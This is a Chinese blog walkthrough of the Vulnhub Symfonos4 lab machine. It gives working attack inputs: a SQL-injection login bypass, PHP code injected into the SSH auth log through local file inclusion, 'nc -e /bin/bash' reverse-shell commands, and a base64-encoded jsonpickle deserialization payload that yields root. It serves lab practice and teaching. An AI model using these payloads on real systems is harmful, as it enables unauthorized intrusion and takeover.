Vulnhub靶机:Symfonos4

标签万能密码本地文件包含日志文件注入端口转发json pickle提权

0x00 环境准备

下载地址:https://www.vulnhub.com/entry/symfonos-4,347/
flag数量:1
攻击机:kali
攻击机地址:192.168.1.31
靶机描述:

Name: symfonos: 4
Difficulty: Intermediate
Tested: VirtualBox
DHCP Enabled
OSCP-like Intermediate real life based machine designed to teach people the importance of trying harder.

We had issues importing with VMware. VirtualBox works okay.

0x01 信息搜集

1.探测靶机地址

命令:arp-scan -l

靶机地址是192.168.1.136

2.探测靶机开放端口

命令:nmap -sV -p- 192.168.1.136

看一下80端口

嗨,还是一张图片,扫一下目录

3.目录扫描

本来我开始用的是dirsearch,但是它扫描不出来php后缀名的文件,我写了-e参数,但是扫不出来,没办法只好换了个工具,这是我当时写的命令,如果有老哥知道是哪里出现问题的话麻烦告诉我一下。

然后我换了gobuster工具来扫描目录,下载地址:https://github.com/OJ/gobuster/releases
字典:/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描出两个php文件和一个目录
看一下http://192.168.1.136/gods页面

发现了三个文件,下载下来看一下

三个神话故事。做了这么多这个系列,已经见怪不怪了。。。
访问一下sea.php文件,直接跳转到了atlantis.php

是个登录界面

0x02 万能密码

登录页面尝试一下万能密码:

Fuzz1:
Username:admin
Password:admin' or 1=1 #

失败
Fuzz2:
Username:admin' or 1=1 #
Password:admin

成功

成功登录。用户名写成admin' ;也可以登录。

登录后跳转到了sea.php页面。
页面有个下拉框,可以选择3个选项,选择一个选项后会出现对应的神话故事,和刚才我们下载的三个文件中的内容一样。猜测这里加载了/gods目录下的文件。

0x03 本地文件包含LFI

使用burp抓包,fuzz一下是否存在本地文件包含。

确实存在文件包含漏洞。但是不能读取/etc/passwd,可能是权限不够。这里读取的文件是/var/log/auth,它是ssh日志文件。正好可以通过ssh向里面写入恶意代码。

0x04 日志文件注入代码——反弹shell

通过ssh/var/log/auth文件注入php代码。
命令:ssh '<?php system($_GET["cmd"]);?>'@192.168.1.136

查看是否可以执行代码:

成功执行。
反弹shell,先在kali上监听一个端口

然后在burp上输入反弹shell的命令:nc+-e+/bin/bash+192.168.1.31+4444。使用burp的话,要用加号代替空格

成功接收到shell

0x05 端口转发

netstat命令不可用,uname -a发现是Debian系统,尝试使用ss -tulpn命令

可以执行,发现本地监听了一个8080端口
如果要访问这个端口就需要端口转发了,查看一下靶机中是否有端口转发的工具

发现靶机中有socat工具,这个工具有端口转发的功能。
那就把靶机的8080端口转发到靶机的7000端口上,一会访问靶机7000端口就相当于访问靶机的8080端口了。
命令:socat tcp-listen:7000,reuseaddr,fork tcp:localhost:8080

点击Main page

0x06 json pickle提权

没有什么信息,就是两个页面,使用burp抓包看看。
点击Main page后,抓到的包里cookie中有个username参数,后面的值看起来被base64加密了

解密看一下

看起来像是一种json格式。这个地方我没遇到过,看了下国外大佬的文章,他参考的是这个链接https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/
我英文不是很好,看了下大概:这是python的pickle模块,这个模块的功能类似于序列化和反序列化的功能,它主要是对Python对象结构进行序列化和反序列化。
文章中给了一个例子:

encoded = jsonpickle.encode(Shell())
      
[*] JSON encoded Pickle: {"py/object": "__main__.Shell", "py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, null, null, null]}

这个例子可以把whoami这条系统命令序列化。
现在我们想要getshell,那就把whoami修改成反弹shell的命令试一下。
将我们修改后的语句进行base64加密,

然后在kali中监听7777端口,将刚才加密后的密文放到cookie的username中,使用burp发包

但是kali并没有接收到shell
又看了一眼表哥的文章,发现还要修改一些东西

要把这里修改成os.system
加密前语句:
{"py/object": "__main__.Shell", "py/reduce": [{"py/type": "os.system"}, {"py/tuple": ["nc -e /bin/bash 192.168.1.31 7777"]}, null, null, null]}
加密后语句:
IHsicHkvb2JqZWN0IjogIl9fbWFpbl9fLlNoZWxsIiwgInB5L3JlZHVjZSI6IFt7InB5L3R5cGUiOiAib3Muc3lzdGVtIn0sIHsicHkvdHVwbGUiOiBbIm5jIC1lIC9iaW4vYmFzaCAxOTIuMTY4LjEuMzEgNzc3NyJdfSwgbnVsbCwgbnVsbCwgbnVsbF19

将修改后的密文粘贴到burp中,再次发包

这次接收到shell了,而且身份直接就是root,不用提权了

flag在/root下

呀呼!一给我里giao!

0x07 小结

本靶机重点是信息搜集时候的目录扫描,只有扫描出目录,才能进行下面的操作。在扫描出敏感目录后,使用万能密码进行登录,登录后发现存在本地文件包含漏洞,通过爆破文件,发现了/var/log/auth文件,这是一个记录ssh日志的文件,通过向ssh注入恶意代码后,可以getshell。查看靶机的内网发现靶机还在监听本地的8080端口,端口转发进行访问。访问网站后,发现cookie中有一些问题,使用json pickle进行getshell,getshell后直接就是root权限了。

由于我不会每天都登录简书,所以有什么私信或者评论我都不能及时回复,如果想要联系我最好给我发邮件,邮箱:Z2djMjUxMTBAMTYzLmNvbQ==,如果发邮件请备注“简书”


参考链接:

1.https://pentesterjourney.com/2019/10/04/vulnhub-symfonos-4-walkthrough/
2.Linux日志文件/var/log详解
3.dirsearch v0.3.9
4.https://github.com/OJ/gobuster/releases
5.在线加密解密

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,470评论 6 501
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,393评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,577评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,176评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,189评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,155评论 1 299
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,041评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,903评论 0 274
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,319评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,539评论 2 332
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,703评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,417评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,013评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,664评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,818评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,711评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,601评论 2 353